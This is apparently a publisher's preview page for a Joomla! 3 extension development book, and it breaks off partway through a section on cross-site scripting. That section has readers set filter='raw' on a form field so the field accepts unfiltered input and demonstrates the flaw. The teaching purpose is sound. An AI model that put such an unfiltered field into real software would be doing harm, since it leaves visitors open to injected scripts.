Book Image

Learning Joomla! 3 Extension Development - Third Edition

By : Timothy John Plummer
Book Image

Learning Joomla! 3 Extension Development - Third Edition

By: Timothy John Plummer

Overview of this book

Joomla 3 is the first of the major open source content management systems that was meant to be mobile friendly by default. Joomla uses object-oriented principles, is database agnostic, and has the best mix of functionality, extensibility, and user friendliness. Add to that the fact that Joomla is completely community driven, and you have a winning combination that is available to everyone, and is the perfect platform to build your own custom applications. "Learning Joomla! 3 Extension Development" is an integrated series of practical, hands-on tutorials that guide you through building and extending Joomla plugins, modules, and components. With Joomla having been downloaded well over 35 million times, there is a huge market for Joomla extensions, so you could potentially earn some extra cash in your spare time using your newly acquired Joomla extension development skills. We will start with developing simple plugins and modules, and then progress to more complex backend and frontend component development. Then we will try our hand at ethical hacking, so you will learn about common security vulnerabilities and what you can do to avoid them. After that we will look at how you can prepare your extensions for distribution and updates, as well as how you can extend your components with various plugins and modules. Finally, you will end up with a fully functioning package of extensions that you can use on your own site or share with others. If you want to build your own custom applications in Joomla, then "Learning Joomla! 3 Extension Development" will teach you everything you need to know in a practical, hands-on manner.
Table of Contents (18 chapters)
Learning Joomla! 3 Extension Development
Credits
About the Author
Acknowledgement
About the Reviewers
www.PacktPub.com
Preface
Index

Cross-site scripting


Cross-site scripting (XSS) is a vulnerability that allows an attacker to insert client-side script into web pages. It can allow attackers to bypass security and execute their own code. Any input field or text area field that does not appropriately filter user input could be a potential doorway for a hacker to inject their XSS code into your website.

We can simulate this vulnerability by removing the input filtering on one of the fields in our form in the frontend updfolio view. Edit folio.xml located under /components/com_folio/models/forms and add the following highlighted code:

<field name="company" type="text" class="inputbox"
  size="40" label="COM_FOLIO_FIELD_COMPANY_LABEL"
  description="COM_FOLIO_FIELD_COMPANY_DESC" required="true" filter="raw" />

By adding the raw filter, we tell Joomla! to not filter the input and just accept it as is, which is something you wouldn't normally want to do.

Now via the updfolios view on your frontend, edit one of the records...